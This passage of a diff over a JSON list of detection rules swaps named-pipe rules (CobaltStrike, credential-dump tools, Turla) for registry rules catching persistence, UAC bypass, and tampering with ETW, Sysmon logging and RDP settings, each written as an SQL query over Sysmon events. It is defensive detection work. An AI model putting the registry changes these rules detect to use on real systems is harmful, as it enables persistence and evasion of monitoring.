'\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Valid Macros and/or internal documents" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1574.012" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + ], + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + }, + { + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", - "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.005", + "attack.t1059.007" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_mal_adwind.yml" + }, + { + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE 